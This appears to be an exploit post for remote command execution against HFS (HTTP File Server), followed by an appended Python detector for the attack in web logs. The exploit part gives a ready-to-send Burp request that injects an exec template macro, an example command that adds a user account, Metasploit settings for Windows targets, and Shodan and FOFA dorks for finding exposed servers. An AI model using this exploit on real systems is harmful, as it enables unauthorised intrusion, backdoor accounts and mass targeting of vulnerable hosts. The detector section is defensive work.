● PoC for Burp:
GET /?n=%0A&cmd=ipconfig+/all&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: HFS_SID_=0.344328237697482
Upgrade-Insecure-Requests: 1
As you can see above, the command that will be sent remotely is "ipconfig /all".
Please keep in mind that if your command has spaces, you should add a plus in between
(for example: net+user+(your_username)+(your_password)+/add).
● The PoC is even able to return the results after sending the request in Burp; just scroll down a little (refer to Figure_1.JPG).
● If you are too lazy to use the Burp PoC, then you can use the new Metasploit module (haven't tried it).
Link: https://github.com/rapid7/metasploit-framework/pull/19240/files
(scroll down till you see the Ruby file)
● If you are going to target Windows systems with this exploit, then here is the necessary config for msf:
set payload cmd/windows/generic (for executing a cmd command)
set RHOSTS (your_remote_target)
check (optional)
run
● Dorks:
Shodan: title:"HFS /" port:80
FOFA: app="HFS"
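As an added defensive example (not part of the original post or of the HFS project), here is a small Python detector that scans web access logs for the template-macro syntax carried in the request above. The log lines are constructed, the combined-log parsing regex is an assumption about your log format, and only `exec` (the macro used in the PoC) is rated high severity.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# HFS template macros look like "{.name|arg|arg.}". In the request above the
# "search" parameter carries "{.exec|...}", so the server expands attacker-supplied
# text as a template. This detector flags any decoded query parameter that contains
# macro syntax at all and escalates when the macro name is exec.
MACRO_RE = re.compile(r"\{\.([A-Za-z?^!]+)")       # "{.exec", "{.?cmd", "{.^abc"
HIGH_RISK_MACROS = {"exec"}                        # macro seen in the PoC request
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')  # assumed combined log format

def inspect_target(target):
    """Return (severity, {param: [macro names]}) for one request target."""
    hits = {}
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        macros = MACRO_RE.findall(value)           # parse_qsl already URL-decodes
        if macros:
            hits[name] = macros
    if not hits:
        return "none", hits
    names = {m.lstrip("?^!") for ms in hits.values() for m in ms}
    return ("high" if names & HIGH_RISK_MACROS else "medium"), hits

def scan_log(text):
    """Return [(line number, severity, hits)] for every log line carrying macro syntax."""
    results = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        severity, hits = inspect_target(m.group(1))
        if severity != "none":
            results.append((lineno, severity, hits))
    return results

# Constructed sample log; line 2 is the request target from the PoC above.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jun/2024:12:00:01 +0000] "GET /?search=report.pdf HTTP/1.1" 200 512
203.0.113.5 - - [10/Jun/2024:12:00:02 +0000] "GET /?n=%0A&cmd=ipconfig+/all&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1" 200 2048
203.0.113.5 - - [10/Jun/2024:12:00:03 +0000] "GET /?search={.?n.} HTTP/1.1" 200 300
"""

if __name__ == "__main__":
    for lineno, severity, hits in scan_log(SAMPLE_LOG):
        print(lineno, severity, hits)
```

Because parse_qsl decodes percent-escapes and pluses before matching, an encoded "{.exec" is caught the same way as a literal one.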